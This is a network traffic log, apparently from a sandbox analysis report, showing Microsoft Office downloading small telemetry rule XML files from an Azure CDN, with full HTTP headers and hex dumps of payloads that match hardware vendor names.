                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:04 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  33192.168.2.44978613.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:04 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:04 UTC470INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:04 GMT
                                  Content-Type: text/xml
                                  Content-Length: 472
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                  ETag: "0x8DC582B9DACDF62"
                                  x-ms-request-id: acd6ed11-801e-0048-15a7-34f3fb000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154204Z-15869dbbcc6bmgjfhC1DFWzfzs000000078g00000000bhe0
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:04 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  34192.168.2.44978813.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:05 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:05 UTC470INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:05 GMT
                                  Content-Type: text/xml
                                  Content-Length: 468
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                  ETag: "0x8DC582B9C8E04C8"
                                  x-ms-request-id: 75018b07-801e-00a0-22a6-342196000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154205Z-15869dbbcc6tfpj2hC1DFW384c00000009mg00000000bm83
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:05 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  35192.168.2.44978913.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:05 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:05 UTC470INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:05 GMT
                                  Content-Type: text/xml
                                  Content-Length: 428
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                  ETag: "0x8DC582BAC4F34CA"
                                  x-ms-request-id: 9f11ee7d-201e-0096-73f2-2cace6000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154205Z-16547b76f7fp46ndhC1DFW66zg0000000fw000000000d9sc
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:05 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  36192.168.2.44979013.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:05 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:05 UTC470INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:05 GMT
                                  Content-Type: text/xml
                                  Content-Length: 499
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                  ETag: "0x8DC582B98CEC9F6"
                                  x-ms-request-id: 8e718dad-301e-0051-6df1-2c38bb000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154205Z-16547b76f7f8dwtrhC1DFWd1zn0000000fxg00000000fcdv
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:05 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  37192.168.2.44978713.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:05 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:05 UTC470INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:05 GMT
                                  Content-Type: text/xml
                                  Content-Length: 404
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                  ETag: "0x8DC582B9E8EE0F3"
                                  x-ms-request-id: 78a78bc2-701e-0053-0ba0-343a0a000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154205Z-15869dbbcc6qwghvhC1DFWw7e8000000016g000000004zav
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:05 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  38192.168.2.44979113.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:06 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:06 UTC470INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:06 GMT
                                  Content-Type: text/xml
                                  Content-Length: 415
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                  ETag: "0x8DC582B988EBD12"
                                  x-ms-request-id: d97b6048-401e-000a-3ba6-344a7b000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154206Z-17df447cdb5wrr5fhC1DFWte8n0000000cn0000000009x2n
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:06 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  39192.168.2.44979313.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:06 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:06 UTC470INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:06 GMT
                                  Content-Type: text/xml
                                  Content-Length: 419
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                  ETag: "0x8DC582BB32BB5CB"
                                  x-ms-request-id: 9dcd50e6-101e-0034-2ca1-3496ff000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154206Z-17df447cdb528ltlhC1DFWnt1c0000000c2g000000003rs0
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:06 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  40192.168.2.44979213.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:06 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:06 UTC491INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:06 GMT
                                  Content-Type: text/xml
                                  Content-Length: 471
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                  ETag: "0x8DC582BB5815C4C"
                                  x-ms-request-id: 47d81796-701e-0021-2403-2d3d45000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154206Z-16547b76f7fnlcwwhC1DFWz6gw0000000fz0000000009pa3
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache-Info: L1_T2
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:06 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  41192.168.2.44979513.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:07 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:07 UTC470INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:07 GMT
                                  Content-Type: text/xml
                                  Content-Length: 420
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                  ETag: "0x8DC582B9DAE3EC0"
                                  x-ms-request-id: 7cdefebb-b01e-0070-2ca7-341cc0000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154207Z-17df447cdb5vp9l9hC1DFW5hw800000007rg00000000ec7c
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:07 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  42192.168.2.44979713.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:07 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:07 UTC491INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:07 GMT
                                  Content-Type: text/xml
                                  Content-Length: 427
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                  ETag: "0x8DC582BA909FA21"
                                  x-ms-request-id: ceff4d6f-101e-007a-10c7-2c047e000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154207Z-16547b76f7fkcrm9hC1DFWxdag0000000g1g000000000sf6
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache-Info: L1_T2
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
                                  2024-11-12 15:42:07 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  43192.168.2.44979613.107.246.45443
                                  TimestampBytes transferredDirectionData
                                  2024-11-12 15:42:07 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                  Connection: Keep-Alive
                                  Accept-Encoding: gzip
                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                  Host: otelrules.azureedge.net
                                  2024-11-12 15:42:07 UTC470INHTTP/1.1 200 OK
                                  Date: Tue, 12 Nov 2024 15:42:07 GMT
                                  Content-Type: text/xml
                                  Content-Length: 472
                                  Connection: close
                                  Cache-Control: public, max-age=604800, immutable
                                  Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                  ETag: "0x8DC582B9D43097E"
                                  x-ms-request-id: 0559421d-e01e-000c-5ba0-348e36000000
                                  x-ms-version: 2018-03-28
                                  x-azure-ref: 20241112T154207Z-17df447cdb5lrwcchC1DFWphes0000000c4g00000000cyee
                                  x-fd-int-roxy-purgeid: 0
                                  X-Cache: TCP_HIT
                                  Accept-Ranges: bytes
